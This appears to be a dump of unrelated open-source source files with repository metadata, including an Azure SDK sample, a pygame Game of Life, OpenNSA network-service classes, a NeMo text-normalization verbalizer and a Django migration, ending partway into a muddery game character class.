] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,649 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.securitydevops import MicrosoftSecurityDevOps
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-securitydevops
# USAGE
python azure_dev_ops_org_get.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = MicrosoftSecurityDevOps(
credential=DefaultAzureCredential(),
subscription_id="00000000-0000-0000-0000-000000000000",
)
response = client.azure_dev_ops_org.get(
resource_group_name="westusrg",
azure_dev_ops_connector_name="testconnector",
azure_dev_ops_org_name="myOrg",
)
print(response)
# x-ms-original-file: specification/securitydevops/resource-manager/Microsoft.SecurityDevOps/preview/2022-09-01-preview/examples/AzureDevOpsOrgGet.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
dbd811dd5df7010727684b4f4b84e20d4e19aec4 | 18430833920b3193d2f26ed526ca8f6d7e3df4c8 | /src/audit_trail/factories.py | 1c5f929866090df1f20621c64c05d9739653dd4a | [
"MIT"
] | permissive | providenz/phase | ed8b48ea51d4b359f8012e603b328adf13d5e535 | b0c46a5468eda6d4eae7b2b959c6210c8d1bbc60 | refs/heads/master | 2021-01-17T06:56:07.842719 | 2016-06-28T11:17:53 | 2016-06-28T11:17:53 | 47,676,508 | 0 | 0 | null | 2015-12-09T07:45:19 | 2015-12-09T07:45:18 | null | UTF-8 | Python | false | false | 379 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import factory
from factory import fuzzy
from accounts.factories import UserFactory
from .models import Activity
class ActivityFactory(factory.DjangoModelFactory):
class Meta:
model = Activity
actor = factory.SubFactory(UserFactory)
verb = fuzzy.FuzzyChoice(zip(*Activity.VERB_CHOICES)[0])
| [
"lp@providenz.fr"
] | lp@providenz.fr |
2d7a63594e9b6b12e395a0d8dcef370df874978a | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03739/s362994379.py | 1519886d81b2b0628ca8e5ba81794a786daf66d9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | py | n = int(input())
s = list(map(int, input().split()))
def cost(t):
res = 0
sum = 0
for y in s:
sum += y
if sum * t <= 0:
res += abs(sum - t)
sum = t
t *= -1
return res
print(min(cost(1), cost(-1)))
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
aca2d0c08f81edea01fb482800cfba161df2fc57 | 1a42c5a6e806deabb721c77619c9bc45bd01c78f | /lifegame.py | e271e25afc804ab32f5046372138895359d72099 | [] | no_license | nsakki55/smartinfo | 74f7ee2337518baef76812468b3f50785bcf4541 | 2777262a2c933d39bc35d1f9b674c8e374da63b7 | refs/heads/master | 2020-06-02T12:07:57.434869 | 2019-06-10T10:50:30 | 2019-06-10T10:50:30 | 191,149,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,751 | py | #!/usr/bin/env python
#coding:utf-8
import pygame
from pygame.locals import *
import random
import sys
import datetime
SCR_RECT = Rect(0, 0, 1440, 1080) # スクリーンサイズ
CS = 10 # セルのサイズ
NUM_ROW = int(SCR_RECT.height / CS) # フィールドの行数
NUM_COL = int(SCR_RECT.width / CS) # フィールドの列数
DEAD, ALIVE = 0, 1 # セルの生死定数
RAND_LIFE = 0.1
class LifeGame:
def __init__(self):
dt_now=datetime.datetime.now()
print(dt_now.microsecond)
pygame.init()
screen = pygame.display.set_mode(SCR_RECT.size)
pygame.display.set_caption(u"Life Game")
self.font = pygame.font.SysFont(None, 16)
# NUM_ROW x NUM_COLサイズのフィールド(2次元リスト)
self.field = [[DEAD for x in range(NUM_COL)] for y in range(NUM_ROW)]
self.generation = 0 # 世代数
self.run = False # シミュレーション実行中か?
self.cursor = [NUM_COL/2, NUM_ROW/2] # カーソルの位置
# ライフゲームを初期化
self.clear()
# メインループ
clock = pygame.time.Clock()
while True:
clock.tick(60)
# dt_now=datetime.datetime.now()
# print(dt_now.microsecond)
self.update()
self.draw(screen)
pygame.display.update()
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == KEYDOWN:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
# 矢印キーでカーソルを移動
elif event.key == K_LEFT:
self.cursor[0] -= 1
if self.cursor[0] < 0: self.cursor[0] = 0
elif event.key == K_RIGHT:
self.cursor[0] += 1
if self.cursor[0] > NUM_COL-1: self.cursor[0] = NUM_COL-1
elif event.key == K_UP:
self.cursor[1] -= 1
if self.cursor[1] < 0: self.cursor[1] = 0
elif event.key == K_DOWN:
self.cursor[1] += 1
if self.cursor[1] > NUM_ROW-1: self.cursor[1] = NUM_ROW-1
# スペースキーでカーソルのセルを反転
elif event.key == K_SPACE:
x, y = self.cursor
x=int(x)
y=int(y)
if self.field[y][x] == DEAD:
self.field[y][x] = ALIVE
elif self.field[y][x] == ALIVE:
self.field[y][x] = DEAD
# sキーでシミュレーション開始
elif event.key == K_s:
self.run = not self.run
# nキーで1世代だけ進める
elif event.key == K_n:
self.step()
# cキーでクリア
elif event.key == K_c:
self.clear()
# rキーでランダムに生きているセルを追加
elif event.key == K_r:
self.rand()
elif event.type == MOUSEBUTTONDOWN and event.button == 1:
# 左ボタンクリックでセルを反転
px, py = event.pos
x, y = px/CS, py/CS
x=int(x)
y=int(y)
self.cursor = [x, y]
if self.field[y][x] == DEAD:
self.field[y][x] = ALIVE
elif self.field[y][x] == ALIVE:
self.field[y][x] = DEAD
def clear(self):
"""ゲームを初期化"""
self.generation = 0
for y in range(NUM_ROW):
for x in range(NUM_COL):
self.field[y][x] = DEAD
for i in range(NUM_ROW):
self.field[i][int(NUM_COL/2)]=ALIVE
for i in range(NUM_ROW):
self.field[i][int(NUM_COL/2)-1]=ALIVE
for i in range(NUM_COL):
self.field[int(NUM_ROW/2)][i]=ALIVE
for i in range(NUM_COL):
self.field[int(NUM_ROW/2)-1][i]=ALIVE
def rand(self):
"""ランダムに生きているセルを追加"""
for y in range(NUM_ROW):
for x in range(NUM_COL):
if random.random() < RAND_LIFE:
self.field[y][x] = ALIVE
def update(self):
"""フィールドを更新"""
if self.run:
self.step() # 1世代進める
def step(self):
"""1世代だけ進める"""
# 次のフィールド
next_field = [[False for x in range(NUM_COL)] for y in range(NUM_ROW)]
# ライフゲームの規則にしたがって次のフィールドをセット
for y in range(NUM_ROW):
for x in range(NUM_COL):
num_alive_cells = self.around(x, y)
if num_alive_cells == 2:
# 周囲の2セルが生きていれば維持
next_field[y][x] = self.field[y][x]
elif num_alive_cells == 3:
# 周囲の3セルが生きていれば誕生
next_field[y][x] = ALIVE
else:
# それ以外では死亡
next_field[y][x] = DEAD
self.field = next_field
self.generation += 1
def draw(self, screen):
"""フィールドを描画"""
# セルを描画
for y in range(NUM_ROW):
for x in range(NUM_COL):
if self.field[y][x] == ALIVE:
pygame.draw.rect(screen, (0,255,0), Rect(x*CS,y*CS,CS,CS))
elif self.field[y][x] == DEAD:
pygame.draw.rect(screen, (0,0,0), Rect(x*CS,y*CS,CS,CS))
pygame.draw.rect(screen, (50,50,50), Rect(x*CS,y*CS,CS,CS), 1) # グリッド
# 中心線を描く
pygame.draw.line(screen, (255,0,0), (0,SCR_RECT.height/2), (SCR_RECT.width,SCR_RECT.height/2))
pygame.draw.line(screen, (255,0,0), (SCR_RECT.width/2,0), (SCR_RECT.width/2,SCR_RECT.height))
# カーソルを描画
pygame.draw.rect(screen, (0,0,255), Rect(self.cursor[0]*CS,self.cursor[1]*CS,CS,CS), 1)
# ゲーム情報を描画
screen.blit(self.font.render("generation:%d" % self.generation, True, (0,255,0)), (0,0))
# screen.blit(self.font.render("space : birth/kill", True, (0,255,0)), (0,12))
# screen.blit(self.font.render("s : start/stop", True, (0,255,0)), (0,24))
# screen.blit(self.font.render("n : next", True, (0,255,0)), (0,36))
# screen.blit(self.font.render("r : random", True, (0,255,0)), (0,48))
def around(self, x, y):
"""(x,y)の周囲8マスの生きているセルの数を返す"""
if x == 0 or x == NUM_COL-1 or y == 0 or y == NUM_ROW-1:
return 0
sum = 0
sum += self.field[y-1][x-1] # 左上
sum += self.field[y-1][x] # 上
sum += self.field[y-1][x+1] # 右上
sum += self.field[y][x-1] # 左
sum += self.field[y][x+1] # 右
sum += self.field[y+1][x-1] # 左下
sum += self.field[y+1][x] # 下
sum += self.field[y+1][x+1] # 右下
return sum
if __name__ == "__main__":
LifeGame()
| [
"n.sakki55@gmail.com"
] | n.sakki55@gmail.com |
804f8e56bedc2fc98d221bf2b9d493cdf526df9b | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /tweens/__init__.py | 084009a757dab8cd2babe574c3a960dc078fa601 | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 1,512 | py | import unrealsdk # type: ignore
from Mods.ModMenu import Game, ModTypes, SDKMod
from .easing import (
back_in,
back_in_out,
back_out,
bounce_in,
bounce_in_out,
bounce_out,
circ_in,
circ_in_out,
circ_out,
cubic_in,
cubic_in_out,
cubic_out,
ease,
elastic_in,
elastic_in_out,
elastic_out,
expo_in,
expo_in_out,
expo_out,
linear,
quad_in,
quad_in_out,
quad_out,
quart_in,
quart_in_out,
quart_out,
quint_in,
quint_in_out,
quint_out,
sine_in,
sine_in_out,
sine_out,
)
from .tween import Tween
__all__ = [
"Tween",
"ease",
"linear",
"quad_in",
"quad_out",
"quad_in_out",
"cubic_in",
"cubic_out",
"cubic_in_out",
"quart_in",
"quart_out",
"quart_in_out",
"quint_in",
"quint_out",
"quint_in_out",
"sine_in",
"sine_out",
"sine_in_out",
"expo_in",
"expo_out",
"expo_in_out",
"circ_in",
"circ_out",
"circ_in_out",
"back_in",
"back_out",
"back_in_out",
"elastic_in",
"elastic_out",
"elastic_in_out",
"bounce_in",
"bounce_out",
"bounce_in_out",
]
class Tweens(SDKMod):
Name = "Tweens"
Version = "1.1"
Types = ModTypes.Library
Description = "A tweening library with various easing functions."
Author = "juso"
Status = "Enabled"
SettingsInputs = {}
SupportedGames = Game.BL2 | Game.TPS | Game.TPS
unrealsdk.RegisterMod(Tweens())
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
c18ae8bfe41026f2887bd16ea6477d010ae39f20 | e50ba4cc303d4165bef9e2917103c084cfbe0e07 | /virtual/bin/easy_install | 6b1f07b5d2a57699078d7cec02fd7d693960f2b8 | [
"MIT"
] | permissive | Antony-me/Ratemyapp | 09049fce54d3a3ed2b256970e7840d20942e8c84 | e547fea82439a3e4f83aa78bf16f93b1ea9ab00b | refs/heads/main | 2023-01-28T16:52:58.635646 | 2020-12-01T16:49:07 | 2020-12-01T16:49:07 | 316,425,507 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 303 | #!/home/moringa/Documents/Moringa-Projects/CORE-PYTHON/Django/Ratemyapp/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"antonymunyasia993@gmail.com"
] | antonymunyasia993@gmail.com | |
fc45af2bfbe4e881ea148db06b773b6a76638522 | ea3e6b14fa345772d930478007deab2b7c5d1c13 | /opennsa/nsa.py | 29387fb4577282590416bbc5d1293a57bf64d927 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | b0urn3/opennsa | d4d0ef81d4ab8a9656e4831b806a9852169c84bd | 6189d21e9ce8885f937607d5d745722593d27d20 | refs/heads/master | 2021-01-22T08:47:22.103847 | 2015-10-01T07:05:01 | 2015-10-01T07:05:01 | 45,279,581 | 0 | 0 | null | 2015-10-30T22:24:12 | 2015-10-30T22:24:12 | null | UTF-8 | Python | false | false | 12,461 | py | """
Core abstractions used in OpenNSA.
In design pattern terms, these would be Data Transfer Objects (DTOs).
Though some of them do actually have some functionality methods.
Author: Henrik Thostrup Jensen <htj@nordu.net>
Copyright: NORDUnet (2011-2013)
"""
import uuid
import random
import urlparse
import itertools
from opennsa import error, constants as cnt
LOG_SYSTEM = 'opennsa.nsa'
URN_UUID_PREFIX = 'urn:uuid:'
BIDIRECTIONAL = 'Bidirectional'
class NSIHeader(object):
def __init__(self, requester_nsa, provider_nsa, correlation_id=None, reply_to=None, security_attributes=None, connection_trace=None):
self.requester_nsa = requester_nsa
self.provider_nsa = provider_nsa
self.correlation_id = correlation_id or self._createCorrelationId()
self.reply_to = reply_to
self.security_attributes = security_attributes or []
self.connection_trace = connection_trace
def _createCorrelationId(self):
return URN_UUID_PREFIX + str(uuid.uuid1())
def newCorrelationId(self):
self.correlation_id = self._createCorrelationId()
def __repr__(self):
return '<NSIHeader: %s, %s, %s, %s, %s, %s>' % (self.requester_nsa, self.provider_nsa, self.correlation_id, self.reply_to, self.security_attributes, self.connection_trace)
class SecurityAttribute(object):
# a better name would be AuthZAttribute, but we are keeping the NSI lingo
def __init__(self, type_, value):
assert type(type_) is str, 'SecurityAttribute type must be a string, not %s' % type(type_)
assert type(value) is str, 'SecurityAttribute value must be a string, not %s' % type(value)
self.type_ = type_
self.value = value
def match(self, sa):
assert type(sa) is SecurityAttribute, 'Can only compare SecurityAttribute with another SecurityAttribute'
return self.type_ == sa.type_ and self.value == sa.value
def __repr__(self):
return '<SecurityAttribute: %s = %s>' % (self.type_, self.value)
class EmptyLabelSet(Exception):
pass
class Label(object):
def __init__(self, type_, values=None):
assert type(values) in (None, str, list), 'Type of Label values must be a None, str, or list. Was given %s' % type(values)
self.type_ = type_
self.values = self._parseLabelValues(values) if values is not None else None
def _parseLabelValues(self, values):
def createValue(value):
try:
if '-' in value:
v1, v2 = value.split('-', 1)
i1, i2 = int(v1), int(v2)
if i1 > i2:
raise error.PayloadError('Label value %s is in descending order, which is not allowed.' % value)
else:
i1 = int(value)
i2 = i1
return i1, i2
except ValueError:
raise error.PayloadError('Label %s is not an integer or an integer range.' % value)
if type(values) is str:
values = values.split(',')
parsed_values = sorted( [ createValue(value) for value in values ] )
# detect any overlap and remove it - remember that the list is sorted
nv = [] # normalized values
for v1, v2 in parsed_values:
if len(nv) == 0:
nv.append( (v1,v2) )
continue
l = nv[-1] # last
if v1 <= l[1] + 1: # merge
nv = nv[:-1] + [ (l[0], max(l[1],v2)) ]
else:
nv.append( (v1,v2) )
return nv
def intersect(self, other):
# get the common values between two labels
assert type(other) is Label, 'Cannot intersect label with something that is not a label (other was %s)' % type(other)
assert self.type_ == other.type_, 'Cannot insersect label of different types'
label_values = []
i = iter(other.values)
o1, o2 = i.next()
for v1, v2 in self.values:
while True:
if v2 < o1:
break
elif o2 < v1:
try:
o1, o2 = i.next()
except StopIteration:
break
continue
label_values.append( ( max(v1,o1), min(v2,o2)) )
if v2 <= o2:
break
elif o2 <= v2:
try:
o1, o2 = i.next()
except StopIteration:
break
if len(label_values) == 0:
raise EmptyLabelSet('Label intersection produced empty label set')
ls = ','.join( [ '%i-%s' % (nv[0], nv[1]) for nv in label_values ] )
return Label(self.type_, ls)
def labelValue(self):
vs = [ str(v1) if v1 == v2 else str(v1) + '-' + str(v2) for v1,v2 in self.values ]
return ','.join(vs)
def singleValue(self):
return len(self.values) == 1 and self.values[0][0] == self.values[0][1]
def enumerateValues(self):
lv = [ range(lr[0], lr[1]+1) for lr in self.values ]
return list(itertools.chain.from_iterable( lv ) )
def randomLabel(self):
# not evenly distributed, but that isn't promised anyway
label_range = random.choice(self.values)
return random.randint(label_range[0], label_range[1]+1)
@staticmethod
def canMatch(l1, l2):
if l1 is None and l2 is None:
return True
elif l1 is None or l2 is None:
return False
try:
l1.intersect(l2) # this checks type as well as range
return True
except EmptyLabelSet:
return False
def __eq__(self, other):
if not type(other) is Label:
return False
return self.type_ == other.type_ and sorted(self.values) == sorted(other.values)
def __repr__(self):
return '<Label %s:%s>' % (self.type_, self.labelValue())
class STP(object): # Service Termination Point
def __init__(self, network, port, label=None):
assert type(network) is str, 'Invalid network type provided for STP'
assert type(port) is str, 'Invalid port type provided for STP'
assert label is None or type(label) is Label, 'Invalid label type provided for STP'
self.network = network
self.port = port
self.label = label
def shortName(self):
base = '%s:%s' % (self.network, self.port)
if self.label:
base += '?' + self.label.type_.split('#')[-1] + '=' + self.label.labelValue()
return base
def baseURN(self):
return cnt.URN_OGF_PREFIX + self.network + ':' + self.port
def urn(self):
# one could probably do something clever with this and the above two functions
label = ''
if self.label is not None:
label = '?' + self.label.type_.split('#')[-1] + '=' + self.label.labelValue()
return self.baseURN() + label
def __eq__(self, other):
if not type(other) is STP:
return False
return self.network == other.network and self.port == other.port and self.label == other.label
def __repr__(self):
return '<STP %s>' % self.shortName()
class Link(object):
def __init__(self, src_stp, dst_stp):
if src_stp.label is None:
assert dst_stp.label is None, 'Source and destination label must either both be None, or both specified'
else:
assert dst_stp.label is not None, 'Source and destination label must either both be None, or both specified'
self.src_stp = src_stp
self.dst_stp = dst_stp
def sourceSTP(self):
return self.src_stp
def destSTP(self):
return self.dst_stp
def __eq__(self, other):
if not type(other) is Link:
return False
return (self.src_stp, self.dst_stp) == (other.src_stp, other.dst_stp)
def __repr__(self):
return '<Link %s == %s>' % (self.src_stp, self.dst_stp)
class Path(object):
"""
Represent a path from a source and destitionation STP, with the endpoint pairs between them.
"""
def __init__(self, network_links):
self.network_links = network_links
def links(self):
return self.network_links
def sourceEndpoint(self):
return self.network_links[0].sourceSTP()
def destEndpoint(self):
return self.network_links[-1].destSTP()
def __str__(self):
return '<Path: ' + ' '.join( [ str(nl) for nl in self.network_links ] ) + '>'
class NetworkServiceAgent(object):
def __init__(self, identity, endpoint, service_type=None):
assert type(identity) is str, 'NSA identity type must be string (type: %s, value %s)' % (type(identity), identity)
assert type(endpoint) is str, 'NSA endpoint type must be string (type: %s, value %s)' % (type(endpoint), endpoint)
self.identity = identity
self.endpoint = endpoint.strip()
self.service_type = service_type
def getHostPort(self):
url = urlparse.urlparse(self.endpoint)
host, port = url.netloc.split(':',2)
port = int(port)
return host, port
def urn(self):
return cnt.URN_OGF_PREFIX + self.identity
def getServiceType(self):
if self.service_type is None:
raise ValueError('NSA with identity %s is not constructed with a type' % self.identity)
return self.service_type
def __str__(self):
return '<NetworkServiceAgent %s>' % self.identity
class ConnectionInfo(object):
# only used for query results
def __init__(self, connection_id, global_reservation_id, description, service_type, criterias, provider_nsa, requester_nsa, states, notification_id, result_id):
assert type(criterias) is list, 'Invalid criterias type: %s' % str(type(criterias))
for criteria in criterias:
assert type(criteria) is QueryCriteria, 'Invalid criteria type: %s' % str(type(criteria))
self.connection_id = connection_id
self.global_reservation_id = global_reservation_id
self.description = description
self.service_type = service_type
self.criterias = criterias
self.provider_nsa = provider_nsa
self.requester_nsa = requester_nsa
self.states = states
self.notification_id = notification_id
self.result_id = result_id
class Criteria(object):
def __init__(self, revision, schedule, service_def):
self.revision = revision
self.schedule = schedule
self.service_def = service_def
class QueryCriteria(Criteria):
# only used for query summary and recursive (but not really used in summary)
def __init__(self, revision, schedule, service_def, children=None):
assert children is None or type(children) is list, 'Invalid QueryCriteria type: %s' % str(type(children))
for child in children or []:
assert type(child) is ConnectionInfo, 'Invalid QueryCriteria child: %s' % str(type(child))
Criteria.__init__(self, revision, schedule, service_def)
self.children = children or []
class Schedule(object):
def __init__(self, start_time, end_time):
# Must be datetime instances without tzinfo
if start_time is not None:
assert start_time.tzinfo is None, 'Start time must NOT have time zone'
assert end_time.tzinfo is None, 'End time must NOT have time zone'
self.start_time = start_time
self.end_time = end_time
def __str__(self):
return '<Schedule: %s-%s>' % (self.start_time, self.end_time)
class Point2PointService(object):
def __init__(self, source_stp, dest_stp, capacity, directionality=BIDIRECTIONAL, symmetric=None, ero=None, parameters=None):
if directionality is None:
raise error.MissingParameterError('directionality must be defined, must not be None')
self.source_stp = source_stp
self.dest_stp = dest_stp
self.capacity = capacity
self.directionality = directionality
self.symmetric = symmetric
self.ero = ero
self.parameters = parameters
| [
"htj@nordu.net"
] | htj@nordu.net |
eff42d766d3d17fe406f91087dcce5791135b309 | 2bf43e862b432d44ba545beea4e67e3e086c1a1c | /nemo_text_processing/inverse_text_normalization/de/verbalizers/decimal.py | ff3839533d7252c14f76c14c774dd3d78e9027a7 | [
"Apache-2.0"
] | permissive | ericharper/NeMo | 719e933f6ffce1b27358bc21efe87cdf144db875 | f1825bc4b724b78c2d6ca392b616e8dc9a8cde04 | refs/heads/master | 2022-10-06T01:45:21.887856 | 2022-09-14T19:09:42 | 2022-09-14T19:09:42 | 259,380,135 | 1 | 0 | Apache-2.0 | 2022-09-20T18:01:57 | 2020-04-27T15:54:20 | Python | UTF-8 | Python | false | false | 1,977 | py | # Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pynini
from nemo_text_processing.text_normalization.en.graph_utils import NEMO_NOT_QUOTE, GraphFst, delete_preserve_order
from pynini.lib import pynutil
class DecimalFst(GraphFst):
"""
Finite state transducer for verbalizing decimal, e.g.
decimal { negative: "true" integer_part: "12" fractional_part: "5006" quantity: "billion" } -> -12.5006 billion
Args:
tn_decimal_verbalizer: TN decimal verbalizer
"""
def __init__(self, tn_decimal_verbalizer: GraphFst, deterministic: bool = True):
super().__init__(name="decimal", kind="verbalize", deterministic=deterministic)
delete_space = pynutil.delete(" ")
optional_sign = pynini.closure(
pynutil.delete("negative: \"") + NEMO_NOT_QUOTE + pynutil.delete("\"") + delete_space, 0, 1
)
optional_integer = pynini.closure(tn_decimal_verbalizer.integer, 0, 1)
optional_fractional = pynini.closure(
delete_space + pynutil.insert(",") + tn_decimal_verbalizer.fractional_default, 0, 1
)
graph = (optional_integer + optional_fractional + tn_decimal_verbalizer.optional_quantity).optimize()
self.numbers = optional_sign + graph
graph = self.numbers + delete_preserve_order
delete_tokens = self.delete_tokens(graph)
self.fst = delete_tokens.optimize()
| [
"noreply@github.com"
] | ericharper.noreply@github.com |
11ba466d6dd826bfe33dce530a4def238f1d18da | e3ddee78a8f5fdc0260d6a5d8f3cbf459dd1aaa8 | /server/apps/places/serializers/ingredients.py | bb43262b935316b8fdb24505cd1d464f33fea434 | [] | no_license | AlAstroMoody/summer_practice | 91b6110f95436f2b91334a4d1626bf2f0a505a50 | 79629bcdcf230a395a53fad0b52e75ebd7385538 | refs/heads/master | 2023-01-15T19:32:22.814893 | 2020-11-23T10:17:46 | 2020-11-23T10:17:46 | 289,492,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from rest_framework.serializers import ModelSerializer
from apps.places.models import Ingredient
class IngredientSerializer(ModelSerializer):
class Meta:
model = Ingredient
fields = ('id', 'name', 'calories')
| [
"aastrotenko@mail.ru"
] | aastrotenko@mail.ru |
176e6e7d4985abd3fc24bc06efd3afa99b86fb8c | 318a2283e9fd8386e1e9b8b33393ec21892ff053 | /tests/formatters/setupapi.py | c64b826daffd96f218ace0517a038c9f956f7480 | [
"Apache-2.0"
] | permissive | ddm1004/plaso | 3a4590f9c7fb5d624938dd1caea703dc92118646 | 88d44561754c5f981d4ab96d53186d1fc5f97f98 | refs/heads/master | 2021-05-19T10:16:24.111136 | 2020-02-27T04:40:48 | 2020-02-27T04:40:48 | 251,647,179 | 0 | 0 | Apache-2.0 | 2020-03-31T15:31:29 | 2020-03-31T15:31:29 | null | UTF-8 | Python | false | false | 918 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Windows Setupapi log event formatter."""
from __future__ import unicode_literals
import unittest
from plaso.formatters import setupapi
from tests.formatters import test_lib
class SetupapiLogFormatterTest(test_lib.EventFormatterTestCase):
"""Tests for the Windows Setupapi log event formatter."""
def testInitialization(self):
"""Tests the initialization."""
event_formatter = setupapi.SetupapiLogFormatter()
self.assertIsNotNone(event_formatter)
def testGetFormatStringAttributeNames(self):
"""Tests the GetFormatStringAttributeNames function."""
event_formatter = setupapi.SetupapiLogFormatter()
expected_attribute_names = [
'entry_type',
'exit_status']
self._TestGetFormatStringAttributeNames(
event_formatter, expected_attribute_names)
if __name__ == '__main__':
unittest.main()
| [
"joachim.metz@gmail.com"
] | joachim.metz@gmail.com |
d0df6dfa88db30e7f5491a7bae3c0a50bff9e42b | dd223d7f6c015c3484e795934bcce62be07e48e4 | /xkyy/apps/starry/migrations/0006_auto_20190524_2005.py | 1f06dadcbb386c125e90a590b9b97e6fa00801c3 | [] | no_license | hfxjd9527/xkyy | 84e696ba8c716dc7c0fb25bf71bb82f21ba314a6 | 61df8774dc63ec1b70cc6daad52da5aa51569076 | refs/heads/master | 2022-12-17T02:35:33.597919 | 2019-06-17T00:11:50 | 2019-06-17T00:11:50 | 190,134,676 | 0 | 0 | null | 2022-12-08T01:46:24 | 2019-06-04T05:22:34 | CSS | UTF-8 | Python | false | false | 985 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.12 on 2019-05-24 20:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('starry', '0005_auto_20190524_1915'),
]
operations = [
migrations.AlterModelOptions(
name='article',
options={'verbose_name': '文章', 'verbose_name_plural': '文章'},
),
migrations.AlterModelOptions(
name='category',
options={'verbose_name': '分类', 'verbose_name_plural': '分类'},
),
migrations.AddField(
model_name='article',
name='is_bigcategory',
field=models.BooleanField(default=True, verbose_name='是否大分类'),
),
migrations.AlterField(
model_name='category',
name='name',
field=models.CharField(max_length=20, verbose_name='分类'),
),
]
| [
"1725824530@qq.com"
] | 1725824530@qq.com |
c3fb12ce35d80f56662ff090d5961a5ed02cef2e | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/gstoption.py | f9d47d30fe88753af428273e2f8939186162e8b2 | [] | no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | # encoding: utf-8
# module gstoption
# from /usr/lib64/python2.6/site-packages/gstoption.so
# by generator 1.136
# no doc
# no imports
# functions
def get_group(*args, **kwargs): # real signature unknown
pass
# no classes
| [
"pkalita@princeton.edu"
] | pkalita@princeton.edu |
66a428a3081b0a3c9ee9125ce6ad9ae55668965e | 85d80b4aa95dcd87ea435d9a582aa74eec2fc67b | /muddery/typeclasses/characters.py | cffd791685749f260728af2af9b7a82598184cbd | [
"BSD-3-Clause"
] | permissive | emanonviroo/muddery | 1ddc4f18bda5faeec05329a61b5927d1465f73f2 | a102afdf8d41faf75bafc20ec36d74a48d6240e3 | refs/heads/master | 2021-07-14T00:36:05.566679 | 2017-10-16T12:40:45 | 2017-10-16T12:40:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23,027 | py | """
Characters
Characters are (by default) Objects setup to be puppeted by Players.
They are what you "see" in game. The Character class in this module
is setup to be the "default" character type created by the default
creation commands.
"""
from __future__ import print_function
import ast
from twisted.internet import reactor
from twisted.internet.task import deferLater
from django.conf import settings
from evennia.objects.objects import DefaultCharacter
from evennia import create_script
from evennia.typeclasses.models import DbHolder
from evennia.utils import logger
from evennia.utils.utils import lazy_property
from muddery.typeclasses.objects import MudderyObject
from muddery.utils import utils
from muddery.utils.builder import build_object
from muddery.utils.skill_handler import SkillHandler
from muddery.utils.loot_handler import LootHandler
from muddery.worlddata.data_sets import DATA_SETS
from muddery.utils.builder import delete_object
from muddery.utils.attributes_info_handler import CHARACTER_ATTRIBUTES_INFO
from muddery.utils.localized_strings_handler import _
class MudderyCharacter(MudderyObject, DefaultCharacter):
"""
The Character defaults to implementing some of its hook methods with the
following standard functionality:
at_basetype_setup - always assigns the DefaultCmdSet to this object type
(important!)sets locks so character cannot be picked up
